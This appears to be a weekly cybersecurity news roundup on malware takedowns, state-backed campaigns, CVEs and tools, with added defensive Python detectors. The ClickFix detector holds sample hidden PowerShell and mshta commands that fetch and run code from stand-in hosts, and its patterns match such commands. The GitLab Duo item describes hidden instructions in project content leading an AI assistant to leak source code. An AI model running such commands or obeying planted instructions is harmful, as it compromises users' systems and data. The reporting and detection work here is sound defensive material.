Cyber threats do not arrive one at a time. They are layered, planned, and stay hidden until it is too late.
For security teams, the key is not just responding to alerts but spotting the early signs of trouble before they become a real threat. This update is designed to give clear, accurate insight grounded in the actual patterns and changes that can be observed. Today's systems are complex enough that what is needed is careful analysis, not noise.
What follows is not only a list of incidents, but a look at where control is gained, lost, and quietly tested.
⚡ Threat of the Week
Lumma Stealer and DanaBot Operations Disrupted – A coalition of private companies and law enforcement agencies has taken down infrastructure tied to Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in developing and deploying DanaBot. The malware can siphon data from victim computers, hijack banking sessions, and steal device information. More unusually, DanaBot has also been used in hacking campaigns that appear to be aligned with Russian state-sponsored interests, a clear example of a crimeware tool being repurposed by Russia-linked hackers for their own ends. In tandem, roughly 2,300 domains that acted as the command-and-control (C2) backbone for the Lumma information stealer were seized. The international actions of the past few days, which also removed 300 servers and neutralized 650 domains used to launch ransomware attacks, constitute the latest phase of Operation Endgame.
🔔 Top News
- Threat Actors Distribute Stealers Using TikTok Videos – ClickFix has become a popular social engineering tactic for delivering malware, and threat actors are now observed using artificial intelligence (AI)-generated videos uploaded to TikTok to trick users into running malicious commands on their own systems. The lure is the promise of activating pirated versions of Windows, Microsoft Office, CapCut, and Spotify; the pasted commands deploy information stealers such as Vidar and StealC. "The campaign highlights that attackers are ready to weaponize currently popular social media platforms for distributing malware," Trend Micro said.
- APT28 Hackers Target Western Logistics and Tech Companies – Cybersecurity and intelligence agencies from Australia, Europe, and the U.S. have issued a joint advisory warning of a state-sponsored campaign by the Russian threat actor APT28 targeting Western logistics entities and technology companies. The agencies said the campaign is likely connected to the group's wide-scale targeting of IP cameras in Ukraine and in bordering NATO countries. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts.
- Chinese Threat Actor Exploits Ivanti EPMM Flaws – The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws in Ivanti Endpoint Manager Mobile (EPMM) software (CVE-2025-4427 and CVE-2025-4428) against targets in a wide range of sectors across Europe, North America, and Asia. The intrusions exploit the vulnerabilities to obtain a reverse shell and drop malicious payloads such as KrustyLoader, which is known to deliver the Sliver command-and-control (C2) framework. "UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization."
- Over 100 Google Chrome Extensions Mimic Popular Tools – An unknown threat actor has been attributed to creating more than 100 malicious Chrome browser extensions since February 2024 that pose as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and site statistics tools while hiding functionality that exfiltrates data, receives commands, and executes arbitrary code. Links to the add-ons are hosted on purpose-built sites to which users are likely redirected via phishing or social media posts. The extensions appear to provide the advertised functionality but also quietly facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and DOM manipulation. Some of them have since been removed by Google.
- CISA Warns SaaS Providers of Attacks Targeting Cloud Environments – The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that SaaS companies are under threat from bad actors going after cloud applications with default configurations and elevated permissions. The agency did not attribute the activity to any particular group, but the advisory noted that enterprise backup platform Commvault is monitoring cyber threat activity targeting its applications hosted in a Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for the Commvault (Metallic) Microsoft 365 (M365) Backup Software-as-a-Service (SaaS) solution," CISA said. "This has led to unauthorized access to the M365 environments of Commvault customers that have application secrets stored by Commvault."
- GitLab AI Coding Assistant Flaw Allows Malicious Code Injection – Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses. The attack could also leak sensitive issue data, such as details about zero-day vulnerabilities. All an attacker needs is to take advantage of the fact that GitLab Duo has broad access to the platform and get the chatbot to interact with a merge request (or commit, issue, or source code) that carries hidden instructions. "Hidden instructions embedded in seemingly harmless project content allowed us to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," the researchers said. One variation of the attack hid malicious instructions inside legitimate source code; another abused the fact that Duo parses and renders its Markdown responses asynchronously, line by line as they stream in, rather than generating the whole response and sending it at once. An attacker can exploit this behavior to introduce malicious HTML that accesses sensitive data and exfiltrates it to a remote server. GitLab has patched the issue following responsible disclosure.
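The TikTok ClickFix item above comes down to a user pasting a remote-fetch-and-execute one-liner into the Run dialog or a terminal, which leaves a recognisable shape in process-creation telemetry. The following is an added Python example, not code from the original page or from Trend Micro: it scores constructed process-creation events (hypothetical records shaped like Sysmon Event ID 1 fields, with made-up `.invalid` URLs) for the usual ClickFix indicators, an interpreter spawned by explorer.exe, a download piped straight into `iex` or run via `mshta`, and a hidden or encoded command. The field names, threshold and sample events are assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (hypothetical; field names mirror
# Sysmon Event ID 1 but the records are not taken from a real log).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "irm https://activate.example.invalid/win.ps1 | iex"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://verify.example.invalid/captcha"},
    {"parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh -NoProfile -File .\\build.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]

# Interpreters that ClickFix lures tell the victim to paste commands into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe"}

# Remote-fetch + execute idioms common in ClickFix one-liners.
REMOTE_FETCH = re.compile(
    r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|curl|wget)\b", re.I)
EXEC_FETCHED = re.compile(r"(\|\s*iex\b|Invoke-Expression|\bmshta\b\s+https?://)", re.I)
HIDDEN_OR_ENCODED = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)


def clickfix_indicators(event: dict) -> list[str]:
    """Return the ClickFix indicators matched by one process-creation event."""
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    image = PureWindowsPath(event["image"]).name.lower()
    cmd = event["command_line"]
    hits = []
    # The Run dialog (Win+R) and the Explorer address bar both spawn children of explorer.exe.
    if parent == "explorer.exe" and image in INTERPRETERS:
        hits.append("interpreter launched from explorer.exe (Run dialog / address bar)")
    if REMOTE_FETCH.search(cmd) and EXEC_FETCHED.search(cmd):
        hits.append("remote content fetched and executed in one command")
    elif image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta.exe executing a remote URL")
    if HIDDEN_OR_ENCODED.search(cmd):
        hits.append("hidden window or encoded command")
    return hits


def detect_clickfix(events: list[dict], min_hits: int = 2) -> list[tuple[int, list[str]]]:
    """Flag events whose indicator count reaches the threshold; returns (index, hits) pairs."""
    flagged = []
    for i, ev in enumerate(events):
        hits = clickfix_indicators(ev)
        if len(hits) >= min_hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for idx, hits in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['command_line']}")
        for h in hits:
            print(f"  - {h}")
```

A developer running `pwsh -File build.ps1` from an editor scores zero, while the two lure commands score two and three, which is why the threshold is two rather than one: any single indicator on its own (an encoded command, say) is too noisy in a real estate.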
🔥 Trending CVEs
Software vulnerabilities continue to be one of the simplest and most effective entry points for attackers. New flaws surface every week, and even a small delay in patching can escalate into a serious security incident. Staying ahead means acting fast. Below is a list of high-risk vulnerabilities that deserve attention this week. Review them carefully, apply updates without delay, and close the door before it is forced open.
This week's list includes CVE-2025-34025, CVE-2025-34026, CVE-2025-34027 (Versa Concerto), CVE-2025-30911 (RomethemeKit for Elementor WordPress plugin), CVE-2024-57273, CVE-2024-54780 (pfSense), CVE-2025-41229 (VMware Cloud Foundation), CVE-2025-4322 (Motors WordPress theme), CVE-2025-47934 (OpenPGP.js), CVE-2025-30193 (PowerDNS), CVE-2025-0993 (GitLab), a flaw in AutomationDirect MB-Gateway whose CVE identifier is not recorded in this list, CVE-2025-47949 (Samlify), CVE-2025-40775 (BIND DNS), CVE-2025-20152 (Cisco Identity Services Engine), CVE-2025-4123 (Grafana), CVE-2025-5063 (Google Chrome), a Linux kernel flaw whose identifier is truncated here, CVE-2025-26817 (Netwrix Password Secure), CVE-2025-47947 (ModSecurity), CVE-2025-3078 and CVE-2025-3079, and CVE-2025-4978 (Netgear).
🌐 Around the Cyber World
- Sandworm Drops New Wiper in Ukraine – The Russia-aligned Sandworm group deployed a new wiper named ZEROLOT to intensify its disruptive operations against Ukrainian energy companies. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure," ESET said. "In recent cases, it deployed the ZEROLOT wiper, for which the attackers abused Active Directory Group Policy in the affected organizations." Another Russian hacking group, Gamaredon, has introduced PteroBox, a file stealer that targets Eastern European countries and leverages Dropbox, and has stepped up its malware obfuscation.
- Signal Says No to Recall – Signal has released a new version of its messaging app for Windows that, by default, blocks the Windows Recall feature from periodically taking screenshots of the app. "Although Microsoft has made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform, even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft officially began rolling out Recall last month.
- Russia Introduces New Law to Track Foreigners Using Smartphones – The Russian government has introduced a new law requiring all foreigners in the Moscow region to install a tracking app. This includes gathering real-time location, fingerprints, facial photographs, and housing information. "The adopted mechanism will allow modern technology to be used to enhance control in the field of migration and will also contribute to reducing the number of violations and crimes in the region," said Vyacheslav Volodin, chairman of the State Duma. "If a migrant changes his actual place of residence, he must notify the Ministry of Internal Affairs (MVD) within three business days." The proposed four-year trial period begins on September 1, 2025 and runs until September 1, 2029.
- Dutch Government Passes Law to Criminalize Cyber Espionage – The Dutch government has approved a law that criminalizes a wide range of espionage activities, including digital espionage, in order to protect national security, critical infrastructure, and high-value technology. Under the amended law, leaking sensitive information that is not classified as a state secret, or engaging in activities on behalf of a foreign government that could harm Dutch interests, also becomes a punishable offense. "Foreign governments are also interested in sensitive, non-state-secret information about specific economic sectors and political decision-making," the government said. "This kind of information can be used to influence political processes, weaken the Dutch economy, or play allies against each other. Spying can include actions other than sharing information."
- Microsoft Announces Availability of Quantum-Resistant Algorithms in SymCrypt – Microsoft has revealed that it is making post-quantum cryptography (PQC) capabilities, including the ML-KEM key encapsulation mechanism and the ML-DSA signature scheme, available in Windows Insiders (Canary Channel Build 27852 and above) and on Linux via SymCrypt-OpenSSL version 1.9.0. "This advancement will allow customers to begin exploring and experimenting with PQC within their production environments," Microsoft said. "Early access to PQC capabilities allows organizations to proactively evaluate the compatibility, performance, and integration of these new algorithms alongside their existing security infrastructure."
- New DoubleLoader Malware Uses Alcatraz for Obfuscation – The open-source obfuscator Alcatraz has been found inside a new generic loader called DoubleLoader, which has been distributed alongside Rhadamanthys Stealer infections since December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hard-coded IP address. "Obfuscators like Alcatraz increase the complexity of malware during triage," Elastic Security Labs said. "Their main goal is to disrupt binary analysis tools and lengthen the reverse engineering process through various techniques, such as hiding control flow and making the decompilation hard to follow."
- New Formjacking Campaign Targets WooCommerce Sites – Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. According to Wordfence, the malware injects fake but professional-looking payment forms into the legitimate checkout process and exfiltrates sensitive customer data to external servers. Further analysis found that the infections likely stem from compromised WordPress administrator accounts, which were used to inject malicious JavaScript via the Simple Custom CSS and JS plugin (or a similar plugin) that lets administrators add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the design and payment workflow of WooCommerce sites, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware authors repurpose the browser's localStorage mechanism, normally used to remember user preferences on websites, to quietly store stolen data and maintain access even after page reloads or when leaving the checkout page."
- EU Sanctions Stark Industries – The European Union has announced sanctions against 21 Russian individuals and six entities over "destabilizing actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider accused of being an enabler "of various Russian state-sponsored and affiliated actors to conduct destabilising activities, including information manipulation and interference and cyberattacks against the Union and third countries." The sanctions also cover CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries had previously been profiled by independent cybersecurity journalist Brian Krebs, who detailed its use in DDoS attacks against Ukraine and Europe. In August 2024, Team Cymru said it had identified 25 IP addresses allocated for hosting domains associated with FIN7 activity and had been working with Stark Industries for several months to identify and reduce abuse of its systems. The sanctions also target Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming and civil aviation disruptions in the Baltic countries.
- The Mask Unmasked as Linked to the Spanish Government – A report published by TechCrunch identifies the mysterious threat actor known as The Mask (aka Careto) as being run by the Spanish government. Russian cybersecurity company Kaspersky first exposed the hacking group in 2014, linking it to highly sophisticated attacks dating back to at least 2007 against high-profile targets such as governments, diplomatic entities, and research institutions. The majority of the group's attacks targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. Kaspersky has never publicly attributed it to any particular country, but the latest revelation makes The Mask one of the few Western government hacking groups to be openly discussed to date, alongside the Equation Group and the Lamberts (U.S.) and Animal Farm (France).
- Social Engineering Scams Target Coinbase Users – Earlier this month, cryptocurrency exchange Coinbase disclosed that it had been the victim of a malicious attack in which unknown threat actors bribed India-based customer support agents in order to breach its systems and siphon customer data. According to blockchain security company SlowMist, Coinbase users have been targeted by social engineering fraud since the beginning of the year with SMS messages claiming that they are the target of social engineering fraud or of a fraudulent withdrawal request, and asking them to confirm, as part of a "persistent and organized fraud campaign." The goal is to induce a false sense of urgency, trick victims into calling a number, and ultimately convince them to transfer funds to a "secure" wallet whose seed phrase was pre-generated by the attacker, who then drains the assets. The activity is attributed primarily to two groups: low-level skid attackers in the Com community and an organized India-based cybercrime group. "Using a spoofed PBX phone system, the scammers impersonate Coinbase support, claiming that users' accounts have had 'unauthorized access' or 'suspicious withdrawals,'" SlowMist said. "They create a sense of urgency and follow up with phishing emails or texts that contain fake ticket numbers or 'recovery links.'"
- Delta Can Sue CrowdStrike Over July 2024 Mega Outage – Delta Air Lines, which was crippled by a massive outage caused by a faulty update issued by CrowdStrike in mid-July 2024, has now been given the green light to pursue its lawsuit against the cybersecurity company. A Georgia judge ruled that Delta may try to prove CrowdStrike was grossly negligent in pushing the flawed update to its Falcon software out to customers. The update crashed 8.5 million Windows devices worldwide. CrowdStrike previously claimed that the airline had rejected offers of technical support from both itself and Microsoft. In a statement shared with Reuters, an attorney representing CrowdStrike said the company was confident the judge would either find no merit in Delta's case or limit damages to "single-digit millions" under Georgia law. The development comes months after MGM Resorts International agreed to pay $45 million to resolve multiple class action lawsuits related to its 2019 data breach and the 2023 cyberattack.
- Storm-1516 Uses AI-Generated Media to Spread Disinformation – The Russian influence operation known as Storm-1516 (aka CopyCop) sought to spread narratives undermining European support for Ukraine by amplifying fabricated stories claiming that European leaders used drugs while traveling to Kyiv by train for peace talks. The content was later shared by Maria Zakharova, a senior official in Russia's Foreign Ministry, and by Russian state media as part of what EclecticIQ described as a coordinated disinformation campaign. The activity is also notable for its use of AI-manipulated content to allege drug possession by French President Emmanuel Macron, British Prime Minister Keir Starmer, and German Chancellor Friedrich Merz on their return from Ukraine. EclecticIQ assessed that, by attacking the reputation of these leaders, the campaign was likely aimed at turning their voters against them and at reducing public support for Ukraine by using the influence operation (IO) to erode trust in the politicians who back it.
- Turkish Users Targeted by DBatLoader – AhnLab has disclosed details of a malware campaign distributing a loader called DBatLoader (aka ModiLoader) via bank-themed phishing emails. "The DBatLoader malware distributed through phishing emails has the cunning behavior of using legitimate processes (easinvoker.exe, loader.exe) through techniques such as DLL side-loading and injection for most of its actions, and it also changes policies," the company said.
- SEC X Account Hacker Sentenced to 14 Months for SIM Swap – Eric Council Jr., a 26-year-old Alabama man, has been sentenced to 14 months in prison for using a SIM-swapping attack in January 2024 to hijack the official X account of the U.S. Securities and Exchange Commission (SEC) and falsely announce that the SEC had approved Bitcoin (BTC) exchange-traded funds (ETFs). Council Jr. (aka Ronin, AGiantSchnauzer, @easymunny) was arrested in October 2024 and pleaded guilty in early February this year. He was also ordered to forfeit $50,000. According to court documents, Council used his personal computer to search for phrases such as how to know for certain whether he was being investigated by the FBI, what the signs are that the FBI is investigating you even if it has not contacted you, and "How long does it take to delete a Telegram account?"
- FBI Warns of Malicious Campaign Impersonating Government Officials – The U.S. Federal Bureau of Investigation (FBI) has warned of a campaign, ongoing since April 2025, in which malicious actors impersonate senior U.S. federal or state government officials and target their contacts. "One way the actors gain such access is by sending targeted individuals a malicious link under the guise of moving to a different messaging platform," the FBI said. From there, the actors can deliver malware or introduce hyperlinks that direct their targets to actor-controlled sites that steal login information.
- DICOM Flaw Allows Attackers to Embed Malicious Code in Medical Image Files – Praetorian has released a proof-of-concept (PoC) for a high-severity security flaw in Digital Imaging and Communications in Medicine (DICOM), the predominant file format for medical imaging. Originally disclosed by Markel Picado Ortiz in 2019, CVE-2019-11687 (CVSS score: 7.8) stems from a design decision that permits arbitrary content at the start of a file. Codenamed ELFDICOM, the PoC extends the attack surface to Linux environments, making it a considerably more serious threat. As a mitigation, Praetorian recommends implementing a DICOM preamble whitelist. "DICOM's file structure allows essentially any bytes at the beginning of the file, where Linux and most operating systems look for magic bytes," said Praetorian researcher Ryan Hennessee. "[The whitelist] checks the preamble of a DICOM file before it is imported into the system. It allows known-good patterns such as 'TIFF' magic bytes and '\x00' null bytes, but a file with ELF magic bytes would be blocked."
- Cookie-Bite Attack Steals Session Tokens Using a Chrome Extension – Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite that uses a custom-made malicious browser extension to steal the "ESTSAUTH" and "ESTSAUTHPERSISTENT" cookies for Microsoft Entra ID and bypass multi-factor authentication (MFA). The attack has several moving parts: a custom Chrome extension that monitors authentication events and captures the cookies; a PowerShell script that automates loading the extension and ensures persistence; an exfiltration mechanism that sends the cookies to a remote collection point; and a complementary extension that injects the captured cookies into the attacker's browser. "Threat actors often use infostealers to extract authentication tokens directly from the victim's machine or purchase them on dark web markets, allowing adversaries to hijack active cloud sessions without triggering MFA," Varonis said. "By injecting these cookies while mimicking the victim's OS, browser, and network, attackers can evade Conditional Access Policies (CAPs) and maintain persistent access." Unlike adversary-in-the-middle (AitM) phishing kits, which capture cookies in transit in real time, the rogue browser extension steals them from inside the browser, requesting excessive permissions so that it can interact with web sessions, modify page content, and extract stored authentication data. Once installed, the extension can access the browser's storage API, intercept network requests, and inject malicious JavaScript into active sessions to harvest session cookies as they are issued. "By leveraging stolen session cookies, adversaries can bypass authentication mechanisms and gain seamless entry into cloud environments without needing user credentials," Varonis said. "Beyond initial access, session hijacking facilitates lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing authorizations or misconfigured roles."
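The preamble whitelist that Praetorian recommends for the DICOM item above is small enough to show in full. The following is an added Python example, not Praetorian's PoC or tooling: it builds a few constructed DICOM Part 10 files inline (a normal image with a null preamble, a TIFF-dual file, and a polyglot carrying an ELF header in the spirit of ELFDICOM), then applies a default-deny check to the 128-byte preamble before the "DICM" magic at offset 128 is trusted. The sample files, the set of allowed patterns, and the reason strings are assumptions for illustration; a real import gateway would also log and quarantine blocked files.

```python
# The DICOM Part 10 layout: 128-byte preamble, "DICM", then the file meta information.
DICM_OFFSET = 128
MAGIC = b"DICM"


def build_dicom(preamble: bytes) -> bytes:
    """Build a minimal, constructed DICOM Part 10 file around the given 128-byte preamble."""
    if len(preamble) != DICM_OFFSET:
        raise ValueError("preamble must be exactly 128 bytes")
    # Group 0002, element 0010 (Transfer Syntax UID), explicit VR little endian.
    uid = b"1.2.840.10008.1.2.1\x00"          # even length, NUL-padded per the standard
    element = b"\x02\x00\x10\x00" + b"UI" + len(uid).to_bytes(2, "little") + uid
    return preamble + MAGIC + element


def preamble_is_known_good(preamble: bytes) -> tuple[bool, str]:
    """Allow-list check on the 128-byte preamble: everything not explicitly known is rejected."""
    if preamble == b"\x00" * DICM_OFFSET:
        return True, "all-null preamble"
    # Classic TIFF header: byte-order mark, magic 42, then the first IFD offset.
    if preamble[:4] in (b"II*\x00", b"MM\x00*"):
        return True, "TIFF header"
    # Default deny from here; name the common executable magics so the log is useful.
    if preamble[:4] == b"\x7fELF":
        return False, "ELF executable header"
    if preamble[:2] == b"MZ":
        return False, "PE/MZ executable header"
    if preamble[:2] == b"#!":
        return False, "script shebang"
    return False, "unrecognised preamble"


def check_dicom_file(data: bytes) -> tuple[bool, str]:
    """Decide whether an inbound file may be imported (True) or must be blocked (False)."""
    if len(data) < DICM_OFFSET + 4 or data[DICM_OFFSET:DICM_OFFSET + 4] != MAGIC:
        return False, "not a DICOM Part 10 file"
    return preamble_is_known_good(data[:DICM_OFFSET])


# Constructed inputs (hypothetical, not real medical images).
NULL_PREAMBLE = b"\x00" * DICM_OFFSET
TIFF_PREAMBLE = (b"II*\x00" + (8).to_bytes(4, "little")).ljust(DICM_OFFSET, b"\x00")
ELF_PREAMBLE = b"\x7fELF\x02\x01\x01\x00".ljust(DICM_OFFSET, b"\x00")

SAMPLES = {
    "ct_scan.dcm": build_dicom(NULL_PREAMBLE),
    "tiff_dual.dcm": build_dicom(TIFF_PREAMBLE),
    "polyglot.dcm": build_dicom(ELF_PREAMBLE),
    "random.bin": b"\xde\xad\xbe\xef" * 40,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        ok, why = check_dicom_file(blob)
        print(f"{name:14} {'ALLOW' if ok else 'BLOCK'} ({why})")
```

The point of the allow-list (rather than a block-list of ELF, MZ and shebang magics) is that the preamble is defined as opaque, so any byte pattern that a loader somewhere treats as executable is a potential polyglot; only the handful of patterns the imaging workflow actually needs should pass.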

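The Cookie-Bite and the malicious-Chrome-extension items above both turn on the same thing: an extension that asks for the cookie, network-interception and all-sites host permissions it needs to lift session cookies from an identity provider page. The following is an added Python example, not code from Varonis, DomainTools or the original page: it reviews extension manifests for that combination of capabilities and scores them, so it can be pointed at the `Extensions` directory of a Chrome profile during triage. The two inline manifests are constructed and hypothetical, and the scoring weights, threshold and list of identity-provider hosts are assumptions for illustration.

```python
import json
from pathlib import Path

# Constructed manifests (hypothetical; not taken from any real extension).
BENIGN_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Word Counter", "version": "1.0",
    "permissions": ["activeTab"],
    "action": {"default_popup": "popup.html"},
})

SUSPICIOUS_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Session Helper", "version": "0.3",
    "permissions": ["cookies", "webRequest", "storage", "scripting", "tabs"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{
        "matches": ["https://login.microsoftonline.com/*"],
        "js": ["inject.js"], "all_frames": True, "run_at": "document_start",
    }],
    "background": {"service_worker": "bg.js"},
})

# Identity-provider hosts where a content script can watch the sign-in flow (assumed list).
IDENTITY_HOSTS = ("login.microsoftonline.com", "login.live.com", "accounts.google.com", "okta.com")
ALL_SITES = ("<all_urls>", "*://*/*", "https://*/*", "http://*/*")


def review_manifest(manifest_json: str) -> dict:
    """Score a Chrome extension manifest for the capabilities session-theft extensions rely on."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", []))
    # MV2 manifests put host patterns in "permissions"; MV3 uses "host_permissions".
    hosts = list(m.get("host_permissions", [])) + [h for h in perms if "://" in h or h == "<all_urls>"]
    findings = []
    if "cookies" in perms:
        findings.append("can read/write cookies via chrome.cookies (session cookies included)")
    if perms & {"webRequest", "webRequestBlocking"}:
        findings.append("can observe or intercept network requests")
    if "scripting" in perms:
        findings.append("can inject JavaScript into pages at runtime")
    if any(h in ALL_SITES for h in hosts):
        findings.append("host access to every site")
    for cs in m.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            if any(idp in pattern for idp in IDENTITY_HOSTS):
                findings.append(f"content script runs on identity provider page: {pattern}")
    if "nativeMessaging" in perms:
        findings.append("can talk to native host binaries")
    score = len(findings)
    if "cookies" in perms and any(h in ALL_SITES for h in hosts):
        score += 2  # cookie read across all hosts is the Cookie-Bite primitive; weight it extra
    return {"name": m.get("name"), "score": score, "findings": findings}


def risky(manifest_json: str, threshold: int = 3) -> bool:
    """True when the manifest reaches the (assumed) review threshold."""
    return review_manifest(manifest_json)["score"] >= threshold


def review_profile(extensions_dir: str) -> list[dict]:
    """Review every <id>/<version>/manifest.json under a Chrome profile's Extensions directory."""
    results = []
    for manifest in Path(extensions_dir).glob("*/*/manifest.json"):
        r = review_manifest(manifest.read_text(encoding="utf-8"))
        r["path"] = str(manifest)
        results.append(r)
    return sorted(results, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for blob in (BENIGN_MANIFEST, SUSPICIOUS_MANIFEST):
        r = review_manifest(blob)
        print(f"{r['name']}: score {r['score']}")
        for f in r["findings"]:
            print(f"  - {f}")
```

Run `review_profile` against a path such as `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions` on a suspect host and look at the top of the list; a legitimate password manager will also score highly, so the output is a triage queue, not a verdict.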

🎥 Cybersecurity Webinar
- Non-Human Identities: The AI Backdoors You Don't See → AI agents rely on non-human identities (such as service accounts and API keys) to function, but these often go untracked. The risk is growing rapidly as attackers shift their focus to this hidden layer. This session shows how to find, secure, and monitor these identities before they are misused. Join the webinar to understand the real risks behind AI adoption and how to stay ahead.
- LOTS Insider Playbook: How Hackers Stay Undetected → Attackers stay hidden by living off trusted sites (LOTS). In this webinar, Zscaler experts share how they detect these stealthy LOTS attacks using insights from the world's largest security cloud. Join us to learn how to spot hidden threats and improve your defenses.
🔧 Cybersecurity Tools
- ScriptSentry → A free tool that scans your environment for misconfigured and dangerous logon scripts, such as plaintext credentials, insecure file and share permissions, and references to non-existent servers. These often-overlooked issues enable lateral movement, privilege escalation, or even credential theft. ScriptSentry helps you quickly identify and fix them in large Active Directory environments.
- Aftermath → A fast, open-source incident response tool for macOS. It collects forensic data from compromised systems, including logs, browser activity, and process information, and analyzes it to build a timeline and trace the infection path. Deploy it via MDM or run it manually. It is fast and lightweight, making it well suited to post-intrusion investigations.
- AI Red Teaming Playground Labs → An open-source training suite with hands-on challenges designed to teach security professionals how to red-team AI systems. Originally developed for Black Hat USA 2024, the labs cover prompt injection, safety bypasses, indirect attacks, and responsible AI failures. Built on Chat Copilot and deployable via Docker, it is a practical resource for testing and understanding real AI vulnerabilities.
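The checks ScriptSentry runs on logon scripts are easy to describe but worth seeing concretely. The following is an added Python example, not ScriptSentry's code: it scans constructed SYSVOL logon scripts (a .bat, a .ps1 and a .vbs, all hypothetical) for inline credentials and for UNC references to servers that no longer resolve, the latter being the classic pre-condition for a rogue host taking the name and serving its own script. The regexes, the sample scripts and the stand-in resolver (a fixed set of "known" hosts in place of DNS) are assumptions for illustration; the share-permission check ScriptSentry also performs needs the live ACLs and is not reproduced here.

```python
import re

# Constructed logon scripts (hypothetical content, not from any real environment).
SCRIPTS = {
    "logon.bat": (
        "@echo off\r\n"
        "net use H: \\\\fs01.corp.example\\home$ /persistent:yes\r\n"
        "net use S: \\\\oldfs.corp.example\\share /user:CORP\\svc_backup Summer2024!\r\n"
    ),
    "map.ps1": (
        "$pw = ConvertTo-SecureString 'Pa55w0rd' -AsPlainText -Force\n"
        "New-PSDrive -Name P -PSProvider FileSystem -Root \\\\fs02.corp.example\\projects\n"
    ),
    "clean.vbs": (
        'Set sh = CreateObject("WScript.Shell")\n'
        'sh.Run "\\\\fs01.corp.example\\tools\\cleanup.exe"\n'
    ),
}

# Stand-in for DNS: the hosts that still exist (constructed). oldfs.corp.example does not.
KNOWN_HOSTS = {"fs01.corp.example", "fs02.corp.example"}

# Per-line patterns for credentials left in scripts.
CRED_PATTERNS = [
    ("net use with inline password",
     re.compile(r"net\s+use\b.*?/user:\S+\s+\S+", re.I)),
    ("plaintext password in ConvertTo-SecureString",
     re.compile(r"ConvertTo-SecureString\s+['\"][^'\"]+['\"]\s+-AsPlainText", re.I)),
    ("password assigned in script",
     re.compile(r"\b(pass(word)?|pwd)\s*=\s*['\"][^'\"]+['\"]", re.I)),
]
# Host component of a UNC path: \\host\share...
UNC_HOST = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")


def scan_script(content: str, resolves) -> list[tuple]:
    """Return (label, line number) for credential hits and (label, host) for dead server references."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        for label, pat in CRED_PATTERNS:
            if pat.search(line):
                findings.append((label, lineno))
    # A UNC reference to a name nobody owns is a takeover target, so it is reported too.
    for host in sorted({h.lower() for h in UNC_HOST.findall(content)}):
        if not resolves(host):
            findings.append(("reference to non-existent server", host))
    return findings


def scan_all(scripts: dict, resolves) -> dict:
    """Scan every script; `resolves(host) -> bool` abstracts the name lookup."""
    return {name: scan_script(body, resolves) for name, body in scripts.items()}


if __name__ == "__main__":
    # Against a real domain, replace the lambda with a socket.gethostbyname wrapper
    # and feed SCRIPTS from \\<domain>\SYSVOL\<domain>\scripts.
    for name, findings in scan_all(SCRIPTS, lambda h: h in KNOWN_HOSTS).items():
        print(name, "clean" if not findings else "")
        for label, where in findings:
            print(f"  - {label}: {where}")
```

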